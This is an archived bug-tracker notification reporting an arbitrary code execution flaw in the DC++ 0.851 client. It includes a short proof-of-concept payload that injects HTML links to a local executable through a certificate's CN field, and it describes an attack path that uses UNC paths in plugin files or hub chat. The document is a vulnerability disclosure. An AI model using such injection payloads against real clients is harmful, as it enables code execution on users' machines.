linuxdcpp-team team mailing list archive

Thread
Date

[Bug 1502650] Re: DC++ 0.851 - Arbitrary code execution

To: linuxdcpp-team@xxxxxxxxxxxxxxxxxxx
From: Kacper <1502650@xxxxxxxxxxxxxxxxxx>
Date: Sun, 04 Oct 2015 18:00:45 -0000
Reply-to: Bug 1502650 <1502650@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Link is correct, Look to PoC:

certificate details:

CN=<a href="file:///c:/Windows/System32/calc.exe">\x0D\x0A<img
src="http://www.troll.me/images/are-you-fucking-kidding-me/srsly.jpg";
/>\x0D\x0A</a>\x0D\x0A<h1><a
href="file:///c:/Windows/System32/calc.exe">Click Here</a></h1>

Its the same PoC with file:// scheme.

-- 
You received this bug notification because you are a member of
Dcplusplus-team, which is subscribed to DC++.
https://bugs.launchpad.net/bugs/1502650

Title:
  DC++ 0.851 - Arbitrary code execution

Status in DC++:
  New

Bug description:
  Details and PoC:
  http://kacperrybczynski.com/research/dcpp_851_arbitrary_code_execution/

  By supplying an UNC path in the *.dcext plugin file or main/pm hub
  chat, a remote file will be automatically downloaded, which can result
  in arbitrary code execution.

To manage notifications about this bug go to:
https://bugs.launchpad.net/dcplusplus/+bug/1502650/+subscriptions

References

[Bug 1502650] [NEW] DC++ 0.851 - Arbitrary code execution
From: Kacper, 2015-10-04